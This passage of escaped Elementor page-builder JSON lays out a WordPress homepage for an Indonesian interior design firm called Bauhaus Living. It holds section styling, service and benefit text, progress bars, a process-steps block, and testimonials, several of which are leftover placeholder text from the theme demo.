\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 